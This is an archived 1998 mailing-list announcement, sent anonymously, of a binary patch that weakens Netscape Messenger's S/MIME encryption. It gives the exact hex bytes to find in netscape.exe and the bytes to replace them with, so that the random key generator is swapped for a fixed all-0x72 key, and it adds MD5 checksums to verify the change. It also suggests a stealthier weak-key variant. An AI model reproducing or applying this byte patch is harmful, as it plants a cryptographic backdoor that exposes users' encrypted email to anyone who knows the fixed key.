[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
announce: WEAK S/MIME support for netscape messenger
- To: [email protected]
- Subject: announce: WEAK S/MIME support for netscape messenger
- From: Anonymous Sender <[email protected]>
- Date: Mon, 13 Apr 1998 14:00:11 -0300
- Comments: This message did not originate from the Sender address above.It was remailed automatically by anonymizing remailer software.Please report problems or inappropriate use to theremailer administrator at <[email protected]>.
- Sender: [email protected]
-----BEGIN PGP SIGNED MESSAGE-----
Hello all,
here's a new weaken patch, this time for netscape's mail client with S/MIME support.
when you send an encrypted email, it is first encrypted with a secret key. the secret
key is then encrypted with the recipient's public key.
this patch will modify netscape's mail client so that whenever it generates a
new key, it generates an all 0x72s key.
i hope i'll find time to release an S/MIME encrypted message parser... so that
anyone can verify the info.
the magic sequence :
look for :
51 6a 00 e8 86 27 00 00 83 c4 0c 8b f8
and change with
6a 72 51 e8 b5 98 94 77 83 c4 0c 33 ff
by just changing 9 bytes, you can read all the encrypted emails !
like the previous sequence, this substitues a call to GenerateRandom to a memset
of course it may be possible to do something more clever, like hashing a 16 bits
random key to produce a 128 bit one ! my ex-boss is already doing that.
here's how to know if the weaken sequence works on your browser:
use the md5 in fortify distrib
md5 -r 0x400-0x32ca00,0x384a00:0x58400 ...\program\netscape.exe
that should produce
aea2aba6f731468e34fd1141f603ea20
the md5 for the whole program (netscape.exe) is :
294dfe9a5e941d12b04e10adafb0c769
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850
iQCVAwUBNTKmWpVRLpSyKBl9AQGVAgP+Opot5VnJOouhwcS58JIdur1Q+xd2twWR
/1q0SlpfsaTi99YIgFBrDpoVhqrW+wQWJmFmGppR5wZtyMNbSm3GPaRm0m9wAOiK
vXsxS9VapEgjVh50caeTEh7e6GEwNBhNEENKbt1WvGWTrnh7K8dqiC3Pla7kmG3Q
syimJN1toCs=
=GIYU
-----END PGP SIGNATURE-----
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQCNAzUuVR4AAAEEALkjQwGKIsBT16nqJbZsWiPOH6gfRkzFav0RmWgjBu/bjDKe
PmC2aGoQV2FXFYGGnX0bHyBz8Qjewdb7aDg/MQsAXjxsSZvqxNEkXGa6bH4U/Fe8
32WBddLrScc6vikaPv0o3D8bgzr+qQM0s9FSP4n5Jb+N/y2YjJVRLpSyKBl9AAUR
tAVtYXJrb4kAlQMFEDUuVR6VUS6UsigZfQEBI9AD/RM6l/Gmw3+IPNQ1fRSFAME3
ZLoWUC6mAW5kUP0IaOFD/tXGXT+ekehcFojHpk9/QIO1mVpxr3bp97/ETZb1ZJiS
EHTEjAP/85gja/YlRubfihUUb5/MoIz94a+MWsoDB0qLDJbQ48vyNsftNDrolUFf
KUdCME7v3al/m6c0wufP
=Bnx/
-----END PGP PUBLIC KEY BLOCK-----